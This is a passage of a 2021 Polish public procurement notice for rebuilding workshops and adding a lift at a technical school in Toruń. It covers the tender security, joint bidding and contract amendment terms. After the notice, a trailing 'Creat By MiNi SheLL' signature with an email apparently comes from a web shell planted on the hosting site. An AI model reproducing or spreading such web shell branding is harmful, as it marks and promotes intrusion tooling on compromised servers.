wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te<br/>zasoby przy wykonywaniu zamówienia;- czy i w jakim zakresie podmiot udostępniający zasoby,<br/>na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w<br/>postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą,d) zastrzeżenie<br/>tajemnicy przedsiębiorstwa (o ile dotyczy) – w sytuacji, gdy oferta lub inne dokumenty składane<br/>w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, wykonawca, wraz z<br/>przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane, oraz wykazuje,<br/>że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy<br/>z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji,e) informacje dotyczące wykonawcy<br/>(załącznik nr 1 do SWZ - dodatkowy formularz ofertowy) f) Wykaz rozwiązań równoważnych –<br/>wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że<br/>oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W<br/>takim przypadku wykonawca załącza do oferty wykaz rozwiązań równoważnych z jego opisem<br/>lub normami.<br/>g)tabela wynagrodzenia ryczałtowego. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wadium w wysokości: 5.000,00 zł ( słownie: pięć tysiący złotych 00/100)<br/>powinno być wniesione przed upływem terminu składania ofert. Okres ważności wadium<br/>powinien być zgodny z terminem związania ofertą.<br/>Wadium może być wniesione w następujących formach:<br/>a) pieniądzu - na konto UMT nr 62 1160 2202 0000 0003 3943 1400 z adnotacją:<br/>51/2021: – Przebudowa pracowni specjalistycznych oraz budowa wewnętrznej windy w budynku<br/>Zespołu Szkól Technicznych w Toruniu.<br/>Za datę i godzinę wniesienia wadium przyjmuję się datę i godzinę jego wpływu na konto<br/>Zamawiającego.<br/>Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 li-stopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2019 r. poz. 310, 836 i 1572).<br/>8. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez<br/>zamawiającego.<br/>9. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>10. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 7 pkt<br/>2–4, Ustawy wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w<br/>postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie<br/>prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.2. W przypadku podmiotów<br/>wspólnie ubiegających się o udzielenie zamówienia oświadczenie o którym mowa w pkt 14.1. a)<br/>SWZ składają odrębnie:każdy spośród wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia<br/>wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu;3. W przypadku<br/>wykonawców wspólnie ubiegających się o zamówienie, podmiotowe środki dowodowe składa<br/>każdy z Wykonawców odrębnie.4. Jeżeli zostanie wybrana oferta wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, zamawiający będzie żądał przed zawarciem umowy<br/>w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców, w<br/>której m.in. zostanie określony pełnomocnik uprawniony do kontaktów z zamawiającym oraz do<br/>wystawiania dokumentów związanych z płatnościami, przy czym termin, na jaki została zawarta<br/>umowa, nie może być krótszy niż termin realizacji zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 7.1.) Zamawiający przewiduje udzielenia zaliczek: Nie<br/>7.3.) Zamawiający przewiduje zmiany umowy: Tak<br/>7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia:<br/>1. W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą<br/>Stron umowy.<br/>2. Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.<br/>3. Dopuszczalne jest dokonanie zmian umowy:<br/>1) w zakresie przedmiotu umowy, terminu realizacji zamówienia i wysokości wynagrodzenia,<br/>jeżeli zmiana umowy będzie korzystna dla Zamawiającego i dotyczyć będzie:<br/>a) zmiany technologii wykonawstwa w stosunku do przewidzianej w dokumentacji projektowej;<br/>b) zamiany materiałów przewidzianych do wykonania robót w stosunku<br/>do materiałów przewidzianych w dokumentacji projektowej;<br/>c) możliwości powierzenia wykonania części robót podwykonawcy robót, których zakres nie<br/>został wskazany w ofercie przez Wykonawcę jako przeznaczony do wykonania przez podwykonawców; 2) w zakresie przedmiotu umowy, terminu realizacji zamówienia i wysokości wynagrodzenia,<br/>jeżeli zmiana umowy dotyczyć będzie materiałów, urządzeń, rozwiązań lub technologii<br/>wskazanych w opisie przedmiotu umowy, w tym w dokumentacji projektowej i polegać będzie na<br/>zastąpieniu ich materiałami, urządzeniami, rozwiązaniami lub technologiami równoważnymi w<br/>przypadku zaistnienia okoliczności uniemożliwiających, znacznie utrudniających lub oczywiście<br/>świadczących o niecelowości nieracjonalności pozyskania materiałów, urządzeń, rozwiązań lub<br/>technologii wskazanych w opisie przedmiotu umowy w tym w dokumentacji projektowej, w<br/>szczególności takich jak zaprzestanie produkcji, zaprzestanie importu, wykrycie wad istotnych;<br/>3) jeżeli zmiana umowy dotyczyć będzie zmiany terminu wykonania przedmiotu zamówienia,<br/>która spowodowana będzie :<br/>a) wystąpieniem warunków atmosferycznych, geologicznych, archeologicznych, terenowych, w<br/>szczególności:<br/>- klęsk żywiołowych;<br/>- warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych,<br/>przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: temperatury<br/>powietrza poniżej 0,0 C, wiatr uniemożliwiający pracę maszyn budowlanych, gwałtowne opady<br/>deszczu (w tym oberwanie chmury), śniegu, gradobicie, burze z wyładowaniami<br/>atmosferycznymi;<br/>- warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych,<br/>przeprowadzanie prób i sprawdzeń zgodnie z technologią przewidzianą przez producentów;<br/>- niewypałów i niewybuchów;<br/>- wykopalisk archeologicznych;<br/>- odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych (kategorie<br/>gruntu, kurzawka, głazy narzutowe, warunki gruntowe itp.);<br/>- odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności<br/>istnienie podziemnych sieci, instalacji, urządzeń lub nie zinwentaryzowanych obiektów<br/>budowlanych (bunkry, fundamenty itp.);<br/>b) wystąpieniem następstw działania organów administracji, które w szczególności dotyczyć<br/>będą:<br/>- przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji<br/>decyzji, zezwoleń, uzgodnień itp.;<br/>- odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na<br/>skutek błędów w dokumentacji projektowej;<br/>c) zaistnieniem uwarunkowań organizacyjno-technicznych, w szczególności mających miejsce w<br/>modernizowanych i remontowanych obiektach, gdzie realizacja robót uwarunkowana jest<br/>przekazaniem frontu prac przez Użytkownika, bądź realizacji prac przez więcej niż jednego<br/>wykonawcę na wspólnym placu budowy, a także w przypadkach przerwania robót objętych<br/>przedmiotem umowy na czas realizacji robót dodatkowych nie objętych zamówieniem<br/>podstawowym prac niemożliwych do przewidzenia albo prac polegających na powtórzeniu<br/>podobnych robót budowlanych, usług lub dostaw;<br/>d) zaistnieniem uwarunkowań formalno-prawnych, w szczególności dotyczących wprowadzenia<br/>zmian do dokumentacji projektowej na etapie wykonawstwa robót z przyczyn niezależnych od<br/>obu Stron; CD( sekcja IX) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umtorun.ezamowienia.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-16 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-14</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> CD (zmiany umowy)e) wystąpieniem innych przyczyn zewnętrznych niezależnych od<br/>Zamawiającego oraz od Wykonawcy skutkujących niemożliwością prowadzenia prac, w<br/>szczególności: brak możliwości dojazdu oraz transportu materiałów na teren budowy<br/>spowodowany awariami, remontami lub przebudowami dróg dojazdowych, protesty<br/>mieszkańców, przerwy w dostawie energii elektrycznej, wody, gazu, przerwy lub opóźnienia w<br/>dostawie materiałów lub urządzeń dedykowanych do wykonania przedmiotu umowy; f)<br/>wystąpieniem innych przyczyn leżących po stronie Zamawiającego, które w szczególności<br/>dotyczyć będą:<br/>- nieterminowego przekazania terenu budowy przez Zamawiającego;<br/>- wstrzymania robót przez Zamawiającego;<br/>- konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;<br/>- przedłużającej się procedury wyboru oferty- powyżej 30 dni;<br/>z zastrzeżeniem, że w przypadku wystąpienia którejkolwiek z okoliczności wymienionych<br/>powyżej termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny<br/>do zakończenia wykonywania jej przedmiotu w sposób należyty;<br/>4) jeżeli zmiana umowy dotyczyć będzie zmiany wysokości wynagrodzenia dla Wykonawcy, a<br/>spowodowana będzie:<br/>- zmianą terminu wykonania prac przez Wykonawcę, jeżeli zmiana terminu wykonania prac<br/>spowoduje bezpośrednio wzrost lub obniżenie kosztów wykonania zamówienia po stronie<br/>Wykonawcy,<br/>- zmianą stawki podatku VAT (wynagrodzenie netto nie ulegnie zmianie); 5)jeżeli zmiana umowy<br/>dotyczyć będzie zmiany składu osobowego zespołu inspektorów nadzoru inwestorskiego<br/>(zmiana ta wymaga jedynie dokonania powiadomienia pisemnego Wykonawcy przez<br/>Zamawiającego); 6) jeżeli zmiana umowy spowodowana będzie siłą wyższą, w tym epidemią,<br/>stanem zagrożenia epidemicznego, stanem epidemii, uniemożliwiającą wykonanie przedmiotu<br/>umowy zgodnie z SWZ i obejmować będzie zmianę umowy w szczególności w zakresie<br/>przedmiotu, terminu wykonania, wysokości wynagrodzenia lub terminu przeprowadzenia odbioru<br/>przedmiotu umowy;<br/>7) jeżeli zmiana umowy dotyczyć będzie zmiany sposobu rozliczania umowy lub dokonywania<br/>płatności na rzecz Wykonawcy w szczególności na skutek zmian w zawartej przez<br/>Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji<br/>projektu; 8)jeżeli zmiana umowy dotyczyć będzie zmiany (wydłużenia) terminu określonego w §<br/>10 ust. 8 i § 11 ust. 3, z przyczyn niezależnych od obu Stron (zmiana ta wymaga jedynie<br/>dokonania powiadomienia pisemnego Wykonawcy przez Zamawiającego zawierającego nowy<br/>termin).<br/>Jeżeli zmiana umowy wymaga zmiany dokumentacji projektowej lub specyfikacji technicznej<br/>wykonania i odbioru robót budowlanych, Strona inicjująca zmianę przedstawi:<br/>- projekt zamienny zawierający opis proponowanej zmiany wraz z informacją o konieczności<br/>zmiany pozwolenia na budowę,<br/>- przedmiar i niezbędne rysunki.<br/>Do każdej propozycji zmiany, inicjujący zmianę przedstawi:<br/>- opis propozycji zmiany, w tym wpływ na terminy wykonania,<br/>- uzasadnienie zmiany,<br/>- obliczenia uzasadniające ewentualną zmianę wynagrodzenia.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-30 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com